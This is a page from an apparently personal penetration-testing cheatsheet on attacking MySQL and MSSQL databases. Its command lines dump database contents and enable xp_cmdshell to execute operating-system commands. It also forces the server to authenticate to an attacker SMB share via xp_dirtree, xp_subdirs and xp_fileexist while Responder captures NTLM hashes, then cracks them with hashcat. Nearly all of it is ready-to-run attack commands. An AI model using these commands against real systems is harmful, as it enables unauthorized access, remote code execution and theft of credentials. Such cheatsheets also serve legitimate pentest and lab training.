Cheatsheet
  • Documentation
  • Nmap
  • Ffuf
  • FTP
  • SMB
  • RPC
  • NFS
  • DNS
  • SMTP
  • IMAP / POP3
  • SNMP
  • SQL
  • Rsync
  • Certipy
  • CrackMapExec
  • Transferring Files
  • Windows Remote Management
  • Windows AV
  • Wordpress
  • Infrastructure Enumeration
  • Privilege Escalation
  • Docker Breakout
  • Shells
  • SSTI
  • XSS
  • Pivot
    • SSH Tunneling
    • Chisel
    • Ligolo-ng
    • Meterpreter
  • LDAP
  • Spray
  • Antivirus / EDR
  • Impacket
  • Bloodhound
  • Powershell
  • Kerberosting
  • Password Attacks
  • Command Injections
  • Sliver C2
  • Windows credentials
  • Windows persistance
  • VSCode Debug
Powered by GitBook
On this page
  • MySQL
  • MSSQL

SQL

MySQL

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'
mysql -h 10.10.10.10 -u root -p
show databases; # Show all databases.
select version();
use qu35t; # Select one of the existing databases.
show tables; # Show all available tables in the selected database.
select * from users; # Show everything in the desired table.

MSSQL

mssqlclient.py qu35t@10.10.10.10 -windows-auth
select name from sys.databases; # List databases
select TABLE_NAME from Backup.INFORMATION_SCHEMA.TABLES; # List tables of a database
select * from Backup.dbo.Users; # Extract data from a table

Enable the module.

enable_xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

Execute a command.

exec xp_cmdshell "whoami"

Start the responder.

responder -I tun0

Use xp_dirtree.

exec xp_dirtree "\\10.10.10.10\qu35t\"

Use xp_subdirs.

exec xp_subdirs "\\10.10.10.10\qu35t\"

Use xp_fileexist.

exec xp_fileexist "\\10.10.10.10\qu35t\"
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
PreviousSNMPNextRsync

Last updated 2 years ago